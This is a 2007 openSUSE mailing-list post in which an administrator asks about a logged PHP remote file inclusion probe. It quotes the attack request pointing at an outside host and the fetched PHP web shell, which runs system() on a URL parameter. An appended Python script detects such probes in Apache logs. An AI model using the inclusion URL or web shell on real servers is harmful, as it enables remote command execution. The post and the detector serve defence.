Mailinglist Archive: opensuse (3566 mails)

RE: [opensuse] Apache access log errors - attack?
  • From: "James D. Parra" <Jamesp@xxxxxxxxxxxxxxxx>
  • Date: Wed, 25 Apr 2007 15:06:24 -0700
  • Message-id: <531F1E080638384C9623B00D71AA546D028FE0DD@xxxxxxxxxxxxxxxxxxxxxxxxx>

On Wed, Apr 25, 2007 at 01:45:34PM -0700, James D. Parra wrote:
> Hello,
> 
> I found these errors in our web logs and it appears that either there is a
> PHP attack on the apache site or perhaps a kit on the server?
> 
> Errors below (profanity not mine);
> 
> 
> 69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"

Looks like some kind of PHP include attack scanner, against lots of PHP
apps.

M.txt contains:
<?
system($_GET['cmd']);
die ("Morfeus hacked you");
?>
~~~~

It doesn't appear that the system was compromised. How can I protect the
system from such an attack?

Best regards,

~James
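
An added example, not part of the original thread: one way to scan an Apache combined-format access log for requests like the one quoted above, where a query parameter's value is itself a remote URL, and to separate probes that got a 404 from ones the server answered with a 2xx. The function name, the `needs_review` field and the two constructed sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
# A parameter value that is itself a remote URL is the mark of an include probe.
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_rfi_probes(lines):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m is None:
            continue  # not a combined-format line
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes values, so encoded probes are caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value):
                status = int(m["status"])
                findings.append({
                    "host": m["host"], "time": m["time"], "agent": m["agent"],
                    "param": name, "remote_url": value, "status": status,
                    # 2xx: the targeted script exists and answered, so review it
                    "needs_review": 200 <= status < 300,
                })
    return findings


SAMPLE_LOG = [
    # from the post above, rejoined onto one line
    '69.94.131.24 - - [02/Apr/2007:09:34:09 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?&/ HTTP/1.1" 404 1046 "-" "Morfeus Fucking Scanner"',
    # constructed: ordinary request, must not be flagged
    '192.0.2.10 - - [02/Apr/2007:09:35:00 -0700] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    # constructed: percent-encoded remote URL that the server answered with 200
    '198.51.100.7 - - [02/Apr/2007:09:36:12 -0700] "GET /gallery/view.php?inc=HTTP%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 312 "-" "-"',
]

if __name__ == "__main__":
    for f in find_rfi_probes(SAMPLE_LOG):
        flag = "REVIEW" if f["needs_review"] else "probe only"
        print(f'{f["time"]} {f["host"]} {f["param"]}={f["remote_url"]} -> {f["status"]} ({flag})')
```

A 2xx here does not prove the include ran; it only means the requested script exists on the server and is worth checking.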
